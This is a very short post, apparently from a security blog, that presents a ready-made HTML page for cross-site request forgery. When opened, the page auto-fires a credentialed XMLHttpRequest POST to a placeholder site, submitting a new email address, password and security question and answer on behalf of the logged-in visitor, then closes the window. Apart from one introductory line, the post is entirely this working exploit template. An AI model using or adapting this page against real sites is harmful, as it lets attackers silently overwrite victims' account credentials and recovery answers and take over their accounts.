CSRF in XHR!!!
Below code can be used to perform CSRF in XHR . <html> <head> <script> function loadXMLDoc() { var xmlhttp=new XMLHttpRequest(); xmlhttp.open("POST","https://example.com",true); xmlhttp.withCredentials = "true"; xmlhttp.send("{\"emailAddress\":\"abcd.92@gmail.com\",\"password\":\"dqazxsw123\",\"securityQuestion\":\"In what city or town was your first job?\",\"securityAnswer\":\"Bangalore\",\"notifyUpdates\":\"true\"}"); //Data window.close(); } </script> </head> <body onload="javascript:loadXMLDoc()"> Action Performed </body> </html>